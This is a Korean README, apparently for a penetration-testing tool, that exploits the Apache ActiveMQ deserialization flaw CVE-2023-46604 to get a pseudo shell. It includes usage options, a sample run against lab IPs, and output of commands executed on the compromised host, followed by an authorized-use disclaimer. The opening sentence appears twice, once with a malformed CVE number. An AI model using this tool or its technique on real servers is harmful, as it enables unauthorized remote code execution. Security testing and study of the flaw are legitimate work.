
이 스크립트는 CVE-2023046604 (Apache ActiveMQ)를 활용하여 의사 셸을 생성합니다. 이 취약점은 OpenWire 프로토콜 내의 안전하지 않은 역직렬화로 인해 원격 코드 실행을 허용합니다.
이 스크립트는 CVE-2023-46604(Apache ActiveMQ)를 활용하여 의사 셸(pseudo shell)을 생성합니다. 이 취약점은 OpenWire 프로토콜 내의 안전하지 않은 역직렬화로 인해 원격 코드 실행을 허용합니다.
CVE-2023-46604는 Apache ActiveMQ의 OpenWire 프로토콜에 존재하는 역직렬화 취약점입니다. 이 결함은 공격자가 ActiveMQ가 실행 중인 서버에서 임의의 코드를 실행하도록 악용될 수 있습니다. 공격자는 악성 XML 파일을 제작할 수 있으며, 해당 파일의 명령어가 원격 서버에서 실행됩니다.
이 익스플로잇은 XML 문서 생성 과정을 자동화하고 추상화하며, 파일을 전달하기 위한 기본 서버를 제공하고 POST를 통해 대상 서버로부터 정보를 수신합니다. 이를 통해 리버스 셸을 호출하거나 바이너리를 배포할 필요 없이 지속적인 익스플로잇이 가능합니다.
익스플로잇 스크립트를 실행하기 전에 다음 사항을 확인하세요:
스크립트에 필요한 것:
선택 사항:
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]
optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP ActiveMQ Server IP or Hostname
-p PORT, --port PORT ActiveMQ Server Port, defaults to 61616
-si SRVIP, --srvip SRVIP
Serve IP
-sp SRVPORT, --srvport SRVPORT
Serve port, defaults to 8080
$python3 exploit.py -i 10.129.230.87 -p 61616 -si 10.10.14.59 -sp 8080
#################################################################################
# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #
# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #
#################################################################################
[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit
#################################################################################
# Not yet connected, send a command to test connection to host. #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you #
# want to re-check the connection. #
#################################################################################
[Target not responding!]$ whoami
activemq
Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x 5 activemq activemq 4.0K Nov 7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov 6 01:18 ..
-rwxr-xr-x 1 activemq activemq 21K Apr 20 2021 activemq
-rwxr-xr-x 1 activemq activemq 6.1K Apr 20 2021 activemq-diag
-rw-r--r-- 1 activemq activemq 17K Apr 20 2021 activemq.jar
-rw-r--r-- 1 activemq activemq 5.5K Apr 20 2021 env
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-32
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-64
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 macosx
-rw-r--r-- 1 activemq activemq 82K Apr 20 2021 wrapper.jar
Apache ActiveMQ$
이 익스플로잇은 X1r0z의 Go 기반 원본 POC와 evkl1d의 Python POC를 기반으로 합니다.
이 코드는 교육 및 윤리적 보안 테스트 목적으로만 제공됩니다. 책임감 있게 사용해야 하며, 명시적 승인이 있는 환경에서만 사용해야 합니다. 무단 또는 악의적인 사용은 엄격히 금지됩니다. 이 코드를 사용함으로써 귀하는 해당 관할권에 적용되는 모든 관련 법률, 규정 및 윤리 기준을 준수하는 데 동의합니다. 제작자와 기여자는 이 코드의 오용 또는 무단 사용으로 인해 발생하는 모든 손해나 결과에 대해 책임을 지지 않습니다.